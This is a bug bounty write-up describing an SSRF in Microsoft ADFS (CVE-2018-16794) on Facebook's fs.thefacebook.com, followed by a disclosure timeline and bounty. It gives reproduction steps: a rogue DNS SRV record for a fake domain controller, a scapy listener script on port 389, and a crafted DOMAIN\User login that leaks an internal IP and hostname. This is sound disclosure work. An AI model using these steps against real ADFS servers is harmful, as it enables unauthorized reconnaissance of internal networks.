According to (CVE-2018-16794), there is the possibility of a SSRF on Microsoft ADFS applications using the “txtBoxEmail” email parameter. I attempted to see how far I could go with it and was only able to receive a Netlogon response that leaked DnsHostName as well as the corporate IP.
1. Set up a fake primary domain controller. When a user logs into fs.thefacebook.com using the ‘DOMAIN\User‘ format, a DNS request is sent out to _ldap._tcp.pdc._msdcs
to check for a domain controller belonging to the ‘DOMAIN‘
In the remote site, the following was used to handle that DNS request, which can be set up easily with domains.google.com
_ldap._tcp.pdc._msdcs SRV 10m 0 100 389 any.example.com
The format is
[priority] [weight] [port] [primary_domain_controller_location]
0 100 389 any.example.com
So a nslookup query will look like
nslookup -type=SRV _ldap._tcp.pdc._msdcs.example.com
Server: 192.168.1.1
Address: 192.168.1.1#53
Non-authoritative answer:_ldap._tcp.pdc._msdcs.phwd.com service = 0 100 389 any.example.com.
2. Set up a listener on the remote site
# https://github.com/jstnkndy/scripts/blob/master/dns_listener.py
import sys
import argparse
import signal
from scapy.all import *
def pkt_callback(pkt):
print pkt[IP].src
if TCP in pkt:
print pkt[TCP].sport
if UDP in pkt:
print pkt[UDP].sport
print pkt
def signal_handler(signal, frame):
print "Caught signal, exiting!";
sys.exit(signal)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--interface", help="Interface to sniff on")
if len(sys.argv) != 3:
parser.print_help()
sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)
args = parser.parse_args()
interface = args.interface
filter = 'tcp and port 389 or udp and port 389'
sniff(iface=interface, filter=filter, prn=lambda x: pkt_callback(x))
if __name__ == "__main__":
main()
It listens for any request on port 389
3. Run the listener then login to the site (fs.thefacebook.com) setting the DOMAIN to the remote site
example.com\example123
Password: doesnotmatter
dns_listener.py --interface eth0
The response will return the remote corporate IP and the DnsHostName for the ADFS.
Impact
A system in Facebook’s infrastructure was identified which could make external requests in an unexpected way. Facebook hardened the infrastructure to avoid such behavior.
Timeline
Mar 11, 2019 – Report sent
Mar 11, 2019 – Confirmation of submission by Facebook
Sep 11, 2019
Hi Philippe,
The product team is working on a fix for this issue as it is a bit of a complex fix.Thanks for your patience. We will follow-up with you when the issue is fixed.
Oct 1, 2019
Hi Philippe,
Just finished chatting with the team and they’ve hardened the infrastructure here to address this issue.
Oct 2, 2019 – $1000 Bounty awarded by Facebook